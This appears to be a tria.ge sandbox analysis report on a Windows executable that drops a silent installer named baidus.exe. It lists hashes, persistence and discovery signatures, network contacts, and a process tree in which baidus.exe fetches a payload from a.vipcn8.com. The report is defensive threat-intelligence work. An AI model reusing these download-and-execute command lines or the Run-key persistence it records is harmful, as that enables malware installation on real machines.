Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

2e6d71ea5a...65.exe

windows7-x64

8

2e6d71ea5a...65.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    170s
  • max time network
    176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/11/2022, 13:02 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe

  • Size

    685KB

  • MD5

    c3955e1a939254d0baba61e7b2975653

  • SHA1

    1b5a5cb1f4eb10776d7ee8ca766e420cd6fa6c57

  • SHA256

    2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65

  • SHA512

    94a22ed7884399306a3ae64dc111295511b8fbcf35433c9bb065dbe9057dbb5fd2371cbd0584662d24031215b719eb19d1f2b3e8efcf0d0e4a7c8242ee2d6875

  • SSDEEP

    12288:RtUBGy8Xz0MqcPHDc2YpKSouCsBvplyt1E5Mx8QVfqlrI+SyjDyD0lRWbk7SZ:UBaXz0MqcPHDc2YpKSo1sBh8t1E5MxZ/

Score
8/10
discoverypersistence

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in Program Files directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
    "C:\Users\Admin\AppData\Local\Temp\2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Program Files (x86)\baidus.exe
      "C:\Program Files (x86)\baidus.exe" /VERYSILENT /SP-
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp" /SL5="$701C6,67416,56832,C:\Program Files (x86)\baidus.exe" /VERYSILENT /SP-
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Adds Run key to start application
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5008
        • C:\Program Files (x86)\baidu\baidus.exe
          "C:\Program Files (x86)\baidu\baidus.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          PID:3172
        • C:\Program Files (x86)\baidu\baidus.exe
          "C:\Program Files (x86)\baidu\baidus.exe" -u=http://a.vipcn8.com/test/3.txt -n=windows.exe
          4⤵
          • Executes dropped EXE
          PID:3828
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\HZ~E081.tmp.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2888
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 2
        3⤵
        • Runs ping.exe
        PID:3680

Network

  • flag-unknown
    DNS
    a.vipcn8.com
    baidus.exe
    Remote address:
    8.8.8.8:53
    Request
    a.vipcn8.com
    IN A
    Response
    a.vipcn8.com
    IN A
    35.205.61.67
  • flag-unknown
    DNS
    151.122.125.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    151.122.125.40.in-addr.arpa
    IN PTR
    Response
  • flag-unknown
    DNS
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    IN PTR
    Response
  • 8.253.208.113:80
    104 B
     2
  • 93.184.220.29:80
    322 B
     7
  • 93.184.221.240:80
    322 B
     7
  • 93.184.221.240:80
    322 B
     7
  • 192.168.1.2:80
    baidus.exe
    260 B
     5
  • 35.205.61.67:80
    a.vipcn8.com
    baidus.exe
    260 B
     5
  • 13.107.21.200:443
    www.bing.com
    tls
    611 B
     7.4kB
     9
    9
  • 93.184.220.29:80
    260 B
     5
  • 52.242.97.97:443
    260 B
     5
  • 20.42.65.84:443
    322 B
     7
  • 8.253.208.113:80
    322 B
     7
  • 8.253.208.113:80
    322 B
     7
  • 8.253.208.113:80
    260 B
     5
  • 8.8.8.8:53
    a.vipcn8.com
    dns
    baidus.exe
    58 B
     74 B
     1
    1

    DNS Request

    a.vipcn8.com

    DNS Response

    35.205.61.67

  • 8.8.8.8:53
    151.122.125.40.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    151.122.125.40.in-addr.arpa

  • 8.8.8.8:53
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    dns
    118 B
     204 B
     1
    1

    DNS Request

    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\baidu\baidus.data
    Filesize

    18KB

    MD5

    6daf9e443cbc584c52f88c1c5890aa79

    SHA1

    127d5d1d4463c176dedcc18c702daf354a34ff9e

    SHA256

    1845a6842901f74e86f05741dbb688b63c54b5fbeaf33baea208041004f1e4bd

    SHA512

    f10837c23bf0e4316351c793f4bb23f74ae1f860c55c50a323f2951a490c43336926d6e15742836c8ec398917d2c461be0a1ef61aec1d3e659f24594dd8db57d

    Download Submit

  • C:\Program Files (x86)\baidu\baidus.exe
    Filesize

    7KB

    MD5

    b155d1a64ad43bdfc95ccaeac0cd6eae

    SHA1

    a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

    SHA256

    a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

    SHA512

    a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

    Download Submit

  • C:\Program Files (x86)\baidu\baidus.exe
    Filesize

    7KB

    MD5

    b155d1a64ad43bdfc95ccaeac0cd6eae

    SHA1

    a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

    SHA256

    a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

    SHA512

    a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

    Download Submit

  • C:\Program Files (x86)\baidu\baidus.exe
    Filesize

    7KB

    MD5

    b155d1a64ad43bdfc95ccaeac0cd6eae

    SHA1

    a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

    SHA256

    a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

    SHA512

    a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

    Download Submit

  • C:\Program Files (x86)\baidus.exe
    Filesize

    305KB

    MD5

    0f91865b8855efd8fd7805e15141d622

    SHA1

    7a73a294710cbf530410008c175f7abbfadd8e6f

    SHA256

    d8a9112e4fa78352f01ab8247421a88d3d1b043974c8212b7277992eb11111f2

    SHA512

    b87f40b9ab25b02e2650eff3ebda7c156f4c5991a540f3f0dcb2f864caf4304bc4be9f495f5c89adeb021bbcb54d53d9cf94b115bc5a8dde43fd7da277d97ed2

    Download Submit

  • C:\Program Files (x86)\baidus.exe
    Filesize

    305KB

    MD5

    0f91865b8855efd8fd7805e15141d622

    SHA1

    7a73a294710cbf530410008c175f7abbfadd8e6f

    SHA256

    d8a9112e4fa78352f01ab8247421a88d3d1b043974c8212b7277992eb11111f2

    SHA512

    b87f40b9ab25b02e2650eff3ebda7c156f4c5991a540f3f0dcb2f864caf4304bc4be9f495f5c89adeb021bbcb54d53d9cf94b115bc5a8dde43fd7da277d97ed2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\HZ~E081.tmp.bat
    Filesize

    266B

    MD5

    e5e32265dd5b1be1560ab3029a7a465a

    SHA1

    4fdc6c2e5a4d5648fdf3cd5d52897d436d03f2da

    SHA256

    44b80154fbbb5e50e93d5203a0a6fbedf7de23c0a396e1de1c997a4a690d3e2b

    SHA512

    e43259682895cc665ffa2bd4496da218c01e6725dedd6f9934f926c462217de6413fdf0b75f00d8a7ad0d563b670525d8e3650add67e5ad72d13c01a0ac3a4d1

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp
    Filesize

    691KB

    MD5

    9303156631ee2436db23827e27337be4

    SHA1

    018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

    SHA256

    bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

    SHA512

    9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp
    Filesize

    691KB

    MD5

    9303156631ee2436db23827e27337be4

    SHA1

    018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

    SHA256

    bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

    SHA512

    9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

    Download Submit

  • memory/436-143-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

    Download

  • memory/436-135-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

    Download

  • memory/436-152-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

    Download

  • memory/3172-148-0x00000000001D0000-0x00000000001D7000-memory.dmp

    Filesize

    28KB

    Download

  • memory/3172-153-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

    Download

  • memory/3172-154-0x00000000001D0000-0x00000000001D7000-memory.dmp

    Filesize

    28KB

    Download

  • memory/3828-151-0x0000000000030000-0x0000000000037000-memory.dmp

    Filesize

    28KB

    Download

  • memory/3828-155-0x0000000000030000-0x0000000000037000-memory.dmp

    Filesize

    28KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.